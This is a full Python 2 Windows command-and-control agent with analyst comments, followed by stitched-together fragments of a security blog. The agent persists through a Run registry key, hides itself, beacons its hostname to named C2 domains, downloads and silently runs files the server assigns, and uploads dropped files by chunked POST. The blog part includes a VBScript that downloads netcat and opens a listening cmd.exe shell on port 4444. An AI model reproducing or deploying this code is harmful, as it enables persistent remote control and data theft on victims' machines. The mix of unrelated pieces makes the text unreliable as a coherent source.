from urllib2 import urlopen
from urllib import urlencode
from glob import glob
from os import path
from os import makedirs
from os import remove
from fileinput import FileInput
from socket import gethostname
from time import sleep
from time import time
from os import popen2
from os import popen
from re import findall
from re import IGNORECASE
from psutil import get_pid_list
from psutil import Process
from sys import exit
from sys import argv
from httplib import HTTPConnection
from os import getpid
from os import kill
def getserver1():
    """Resolve the command-and-control host used by the rest of this script.

    Analyst note: the file below is a Windows C2 agent (Python 2).  It
    persists via an HKCU Run value, copies itself into a hidden directory,
    polls a web server for files to download and execute, and uploads
    everything dropped into ``c:\\dir`` back to that server.

    Control flow here: fetch a one-character flag page; if it reads ``1``,
    the C2 hostname is taken from a second page, otherwise (or on any
    failure, including non-numeric content) the hard-coded fallback
    ``games-playbox.com`` is used.  Both URLs and the fallback domain are
    the network indicators for this stage.
    """
    srv = "games-playbox.com"   # fallback C2 host
    try:
        code1 = urlopen('http://worldvoicetrip.com/games/index.html')
        code2 = code1.read()
        if int(code2) == 1:
            # flag set: the real host is served from the second page
            code3 = urlopen('http://worldvoicetrip.com/games/domain.html')
            code4 = code3.read()
            return code4
        else:
            return srv
    except:
        # bare except: network errors and int() failures all fall back
        return srv
        pass
# Server-side path prefix prepended to every C2 URL below.
foldername = "/winone1"
# Staging directories (created further down and marked hidden+system).
# dir1 is the upload drop folder; dir2 holds the agent copy, run.bat/run.vbs
# and any downloaded payloads; dir4 is used to skip dir2 when scanning dir1.
dir1 = "c:\\dir\\"
dir3 = "c:\\dir"
dir2 = "c:\\dir\\dir2\\"
dir4 = "dir2"
# Location and basename of this script itself (argv[0]); file17 is the
# name used for the Run-key value, the self-copy and the duplicate-process check.
_file = path.abspath(argv[0])
fpath = path.dirname(path.realpath(_file))
file17 = path.basename(_file)
def SysInfo():
    """Return ``{"System Model": <value>}`` scraped from ``SYSTEMINFO`` output.

    Runs the Windows ``SYSTEMINFO`` command through popen2 and reads its
    stdout.  Only the "System Model" line is extracted; the ``[0]`` index
    raises IndexError when the line is absent, which the caller's bare
    except turns into the placeholder value "Test".
    """
    values = {}
    cache = popen2("SYSTEMINFO")
    source = cache[1].read()   # cache[1] is the child's stdout
    sysOpts = ["System Model"]
    for opt in sysOpts:
        values[opt] = [item.strip() for item in findall("%s:\w*(.*?)\n" % (opt), source, IGNORECASE)][0]
    return values
# --- VM check (inert) ---------------------------------------------------
# The System Model string is inspected for "VMware"; the exit() is commented
# out, so the check only prints and the agent keeps running inside a VM.
try:
    sysinfo1 = SysInfo()
    sysinfo2 = str(sysinfo1)
except:
    sysinfo2 = "Test"
    pass
if sysinfo2.find("VMware") <> -1:
    print "VMware"
    #exit()
# --- single-instance enforcement -----------------------------------------
# Count other processes whose name contains this script's basename.
# More than two such processes -> this instance exits; otherwise the last
# matching process found is killed (SIGKILL / TerminateProcess), so a newly
# launched copy replaces an already running one.
pcount = 0
xx = get_pid_list()
myid = getpid()
for i in xx:
    try:
        pro = Process(i).name
        if pro.find(file17) <> -1:
            if i != myid:
                p = i            # remembers only the last match
                pcount = pcount + 1
    except:
        continue                 # process vanished / access denied: skip
if pcount > 2:
    exit()
try:
    kill(p, 9)
except:
    pass                         # no other instance: p is unbound, NameError swallowed
class ChunkedEncodingWrapper(object):
    """Wrap a readable file object so read() yields HTTP chunked encoding.

    Each block of ``blocksize`` bytes read from ``fileobj`` is emitted as
    ``<hex length> CRLF <data> CRLF``; end of input produces the terminating
    ``0 CRLF CRLF`` chunk.  Used below as the body object passed to
    HTTPConnection.request() together with a ``Transfer-Encoding: chunked``
    header, which is how the agent streams files to the server without
    knowing their Content-Length up front.
    """
    def __init__(self, fileobj, blocksize=102400):
        self.fileobj = fileobj          # source stream (opened in binary mode by the caller)
        self.blocksize = blocksize      # raw bytes per chunk, default 100 KiB
        self.current_chunk = ""         # encoded bytes not yet returned by read()
        self.closed = False             # set once the terminating chunk was produced
    def read(self, size=None):
        """Return up to ``size`` encoded bytes, or everything if ``size`` is None.

        Whole chunks are appended while they fit, pulling the next one via
        _get_chunk(); when only part of the pending chunk fits, the loop's
        ``else`` splits it and keeps the remainder for the next call.
        """
        ret = ""
        while size is None or size >= len(self.current_chunk):
            ret += self.current_chunk
            if size is not None:
                size -= len(self.current_chunk)
            if self.closed:
                # terminating chunk already handed out: nothing more to read
                self.current_chunk = ""
                break
            self._get_chunk()
        else:
            # loop condition went false (no break): partial chunk fits
            ret += self.current_chunk[:size]
            self.current_chunk = self.current_chunk[size:]
        return ret
    def _get_chunk(self):
        """Read the next block from fileobj and store it chunk-encoded."""
        if not self.closed:
            chunk = self.fileobj.read(self.blocksize)
            if chunk:
                self.current_chunk = "%x" % (len(chunk),) + "\r\n" + chunk + "\r\n"
            else:
                # EOF: last-chunk marker, subsequent reads return ""
                self.current_chunk = "0\r\n\r\n"
                self.closed = True
# --- installation / persistence -------------------------------------------
# Host artifacts created here: c:\dir, c:\dir\dir2, dir2\run.bat, dir2\run.vbs,
# a copy of the script in dir2, and an HKCU Run value named "Search".
if not path.exists(dir1):
    makedirs(dir1)
if not path.exists(dir2):
    makedirs(dir2)
try:
    # run.bat registers the dir2 copy of this script under
    # HKCU\Software\Microsoft\Windows\CurrentVersion\Run (value "Search").
    batch = open(dir2+'run.bat','wb')
    bat2='REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Search /t REG_SZ /d "%s%s" /f'%(dir2,file17)
    batch.write(bat2)
    batch.close()
    # run.vbs launches run.bat through WScript.Shell.Run with window style 0
    # (hidden), so no console window appears while the key is written.
    f1 = open(dir2+'run.vbs','wb')
    data12='Set WshShell = CreateObject("WScript.Shell" )\n'
    data12+='WshShell.Run chr(34) & "'+dir2+'run.bat" & Chr(34), 0\n'
    data12+='Set WshShell = Nothing'
    f1.write(data12)
    f1.close()
    the_output = popen(dir2+"run.vbs").read()
except:
    pass
# Mark c:\dir hidden+system and drop a copy of the script into dir2.
# NOTE(review): the copy source is the bare basename, so this presumably
# only succeeds when the working directory is the script's own directory.
the_output = popen("attrib +h +s %s"%(dir3)).read()
the_output = popen("copy %s %s"%(file17,dir2)).read()
# Hostname doubles as the victim identifier in every C2 request below.
cname = gethostname()
def splitFile(inputFile,chunkSize,basename1):
    """Split ``inputFile`` into ``chunkSize``-byte pieces next to the original.

    Writes ``<inputFile>-info.txt`` containing ``<basename>,<chunk count>``
    and ``<inputFile>-1``, ``<inputFile>-2``, ... holding the data.  The
    whole file is read into memory first.  Called from the upload loop for
    files above its size threshold so each piece can be uploaded separately.

    Note: the info line uses the module-level name ``basename`` (assigned by
    the caller's loop before this is called), not the ``basename1`` parameter.
    """
    f = open(inputFile, 'rb')
    data = f.read()
    f.close()
    bytes = len(data)               # shadows the builtin; total file size
    noOfChunks= bytes/chunkSize     # Python 2 integer division
    if(bytes%chunkSize):
        noOfChunks+=1
    f = open(inputFile+'-info.txt', 'w')
    f.write(basename+','+str(noOfChunks))
    f.close()
    chunkNames = []                 # collected but never returned or used
    j = 0
    # range end is bytes+1, so an exact multiple of chunkSize yields one
    # extra, empty trailing chunk file.
    for i in range(0, bytes+1, chunkSize):
        j = j + 1
        fn1 = inputFile+"-%s" % j
        chunkNames.append(fn1)
        f = open(fn1, 'wb')
        f.write(data[i:i+ chunkSize])
        f.close()
getserver = getserver1()   # C2 hostname, resolved once at startup (see getserver1)
def runfile(ext):
    """Execute the file at path ``ext`` hidden, via a temporary run.vbs.

    A WScript.Shell.Run with window style 0 is written to dir2\\run.vbs,
    executed through popen, and the .vbs removed afterwards; a zero-byte
    target is written to the .vbs but never launched.  All errors are
    swallowed.

    Note: the guard compares the module-level ``dfile`` (bound by the
    ``for dfile in ...`` loops at module scope; the loop variables inside
    dex/dex1 are local to those functions), not ``ext``.  When that name
    contains this script's basename the file is deleted instead of run,
    presumably to avoid re-launching the agent's own copy; when it is not
    yet bound, the NameError is silently swallowed and nothing runs.
    """
    sleep(2)
    data2len = len(ext)
    if data2len <> 0:
        try:
            if dfile.find(file17) == -1:
                f1 = open(dir2+'run.vbs','wb')
                data12='Set WshShell = CreateObject("WScript.Shell" )\n'
                data12+='WshShell.Run chr(34) & "'+ext+'" & Chr(34), 0\n'
                data12+='Set WshShell = Nothing'
                f1.write(data12)
                f1.close()
                size1 = path.getsize(ext)
                if size1 <> 0:
                    the_output = popen(dir2+"run.vbs").read()
                    remove(dir2+"run.vbs")   # stager removed after launch
            else:
                remove(dfile)
        except:
            pass
def dex(cname):
    """Check in with the C2 and fetch/run whatever it assigns to this host.

    GET ``/winone1/online.php?sysname=<hostname>`` returns a ``;``-separated
    list of file names; each is downloaded from ``/winone1/download/<name>``
    into dir2 and passed to runfile().  Per-file and overall failures are
    swallowed.  Network indicators: the online.php beacon carrying the
    hostname, followed by download/ requests.
    """
    try:
        dfiles5 = urlopen("http://"+ getserver + foldername+ "/online.php?sysname="+cname+"")
        dfiles6 = dfiles5.read()
        dfiles7 = dfiles6.split(';')
        data7len = len(dfiles6)
        if data7len <> 0:
            # ``dfile`` here is local to dex; runfile() reads the module-level one.
            for dfile in dfiles7:
                try:
                    f5 = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile)
                    output1=open(dir2+"%s"%dfile,'wb')
                    output1.write(f5.read())
                    output1.close()
                    dfile = dir2+dfile
                    runfile(dfile)
                except:
                    continue
    except:
        pass
def dex1():
    """Hourly refresh: download and run files listed by ``getfile.php``.

    Called from the main loop roughly once an hour.  Note that the freshly
    fetched response (``dfiles11``) is never used: the list that is split
    and iterated is the module-level ``dfiles1`` read at startup, so this
    re-processes the initial file list.  The "already present" test compares
    bare names against full paths from glob(), so it presumably never
    matches and files are re-downloaded each time.
    """
    try:
        dfiles12 = urlopen("http://"+ getserver + foldername+ "/getfile.php")
        dfiles11 = dfiles12.read()
        dfiles13 = dfiles1.split(';')
        files11 = glob(dir2+"*")       # full paths under dir2
        for dfile14 in dfiles13:
            try:
                if not (dfile14 in files11):
                    f11 = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile14)
                    output11=open(dir2+"%s"%dfile14,'wb')
                    output11.write(f11.read())
                    output11.close()
                    dfile = ''
                    dfile = dir2+dfile14   # local to dex1; runfile() reads the global
                    runfile(dfile)
            except:
                continue
    except:
        pass
# --- initial tasking ------------------------------------------------------
# Register the host (post.php with an empty filename) and fetch the initial
# ``;``-separated file list from getfile.php.  An empty list, or any error,
# falls back to running whatever .exe files are already in dir2.
try:
    urlopen("http://"+ getserver + foldername+ "/post.php?filename=&folder="+cname+"//")
    dfiles2 = urlopen("http://"+ getserver + foldername+ "/getfile.php")
    dfiles1 = dfiles2.read()          # also consumed later by dex1()
    datalen3 = len(dfiles1)
    if datalen3 == 0:
        dfiles = ''
        dfiles = glob(dir2+"*.exe")
        for dfile in dfiles:          # binds the module-level ``dfile`` read by runfile()
            try:
                runfile(dfile)
            except:
                continue
    else:
        dfiles = dfiles1.split(';')
        for dfile in dfiles:
            try:
                f = urlopen("http://"+ getserver + foldername+ "/download/%s"%dfile)
                output=open(dir2+"%s"%dfile,'wb')
                output.write(f.read())
                output.close()
                dfiles = ''
                dfiles = dir2+"%s"%(dfile)
                runfile(dfiles)
            except:
                continue
except:
    dfiles = ''
    dfiles = glob(dir2+"*.exe")
    for dfile in dfiles:
        try:
            runfile(dfile)
        except:
            continue
remove(dir2+"run.bat")               # persistence stager cleaned up; run.vbs is reused by runfile()
print "Enting While"
# --- main loop -----------------------------------------------------------
# Every second: scan the drop folder c:\dir and upload each file found
# (excluding the dir2 subdirectory) to post.php as a chunked POST, deleting
# it afterwards.  Every ~120 iterations the agent beacons via dex(); every
# hour it re-runs dex1().  Everything is wrapped in bare excepts, so the
# loop never terminates on its own.
time1 = int(time())
count = 0
while True:
    try:
        time2 = int(time())
        tdif = time2 - time1
        if tdif > 3600:
            dex1()
            time1 = int(time())
        sleep (1)
        count = count + 1
        files = glob(dir1+"*")
        if count > 120 :
            urlopen("http://"+ getserver + foldername+ "/post.php?filename=&folder="+cname+"//")
            dex(cname)
            count = 0
        for file1 in files:
            try:
                if file1.find(dir4) <> -1:
                    continue              # skip the dir2 entry itself
                # Open for writing as a "not in use" probe; files still held
                # by another process are retried on a later pass.
                try:
                    myfile = open(file1, "r+")
                except:
                    continue
                myfile.close()
                basename = path.basename(file1)   # module-level name also read by splitFile()
                size = path.getsize(file1)
                if size > 105163101 :
                    # Oversized file: split into pieces and delete the original.
                    # The open() below then fails on the removed path and the
                    # bare except skips to the next file; the pieces are picked
                    # up by later glob() passes.
                    splitFile(file1,105163101,basename)
                    remove(file1)
                # Exfiltration: streamed as chunked POST to
                # /winone1/post.php?filename=<name>&folder=<hostname>/
                data = open(file1,"rb")
                w = ChunkedEncodingWrapper(data)
                v = urlencode({'filename': basename})
                x = urlencode({'folder': cname})
                headers = {"Transfer-Encoding": "chunked"}
                c = HTTPConnection(getserver)
                c.request("POST", "%s/post.php?%s&%s/"%(foldername,v,x), w, headers)
                data.close()
                remove(file1)             # uploaded file deleted from the drop folder
                dex(cname)
                count = 0
                time2 = int(time())
                tdif = time2 - time1
                if tdif > 3600:
                    dex1()
                    time1 = int(time())
            except:
                pass
    except:
        pass
What Science is All About
This is a good lay description of science:
If you cherry-pick scientific truths to serve cultural, economic, religious or political objectives, you undermine the foundations of an informed democracy.
Science distinguishes itself from all other branches of human pursuit by its power to probe and understand the behavior of nature on a level that allows us to predict with accuracy, if not control, the outcomes of events in the natural world. Science especially enhances our health, wealth and security, which is greater today for more people on Earth than at any other time in human history.
The scientific method, which underpins these achievements, can be summarized in one sentence, which is all about objectivity:
Do whatever it takes to avoid fooling yourself into thinking something is true that is not, or that something is not true that is.
Given the current trend with pop-psychology books, it’s nice to see someone write something that is easily accessible, yet accurate.
Transfer a disk image via dd and ssh
To transfer a disk image via an ssh tunnel (think evidence collection across the internet):
dd if=</path/to/disk> | ssh user@host "dd of=<filename>"
For example:
dd if=/dev/sda | ssh user@example.com "dd of=image.dd"
In practice, you’ll probably want to use some additional dd options such as bs (block size), count, etc. If doing this for evidentiary purposes, dcfldd, dc3dd, ewfacquire, and others, provide more forensic-friendly options.
To compress data before sending it across the network, add bzip2 (or gzip) with another pipe:
dd if=</path/to/disk> | bzip2 | ssh user@host "dd of=<filename>"
Creating an EICAR test file
Copy and save the following as eicar.com (yes, it’s an all ASCII .com file):
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
As a sanity check, the file should be 68 bytes long. You can also try running the file, which should print “EICAR-STANDARD-ANTIVIRUS-TEST-FILE” to the screen.
Alternatively, you can download eicar.com.txt.
Python Web Server in One Line
Quick and dirty web server in Python that serves files out of the current directory.
For Python 3.X:
python -m http.server 8080
For Python 2.X:
python -m SimpleHTTPServer
Invoke the Python Debugger in One Line
Add the following snippet where you want to invoke the Python debugger:
import pdb;pdb.set_trace()
VBScript to Download a File (Over HTTP) and Execute It
' Analyst note: minimal download-and-execute pattern.  The three COM objects
' used together in one script (Microsoft.XMLHTTP for the fetch, ADODB.Stream
' for the binary write, WScript.Shell for execution) are the thing to look
' for when hunting for this kind of stager; the URL, saved name and command
' are the constants declared below.
dim http_obj
dim stream_obj
dim shell_obj
set http_obj = CreateObject("Microsoft.XMLHTTP")
set stream_obj = CreateObject("ADODB.Stream")
set shell_obj = CreateObject("WScript.Shell")
URL = "http://www.mikemurr.com/example.exe" 'Where to download the file from
FILENAME = "nc.exe" 'Name to save the file (on the local system)
RUNCMD = "nc.exe -L -p 4444 -e cmd.exe" 'Command to run after downloading
http_obj.open "GET", URL, False 'synchronous request (third argument False)
http_obj.send
stream_obj.type = 1 'adTypeBinary: write the response body as raw bytes
stream_obj.open
stream_obj.write http_obj.responseBody
stream_obj.savetofile FILENAME, 2 'adSaveCreateOverWrite: replaces an existing file
shell_obj.run RUNCMD
The Problem With Conspiracy Theorists
Confirmation Bias

The Original Netcat Backdoor
Token First Post
Welcome to Mike Murr’s personal blog… This is the token first post 🙂
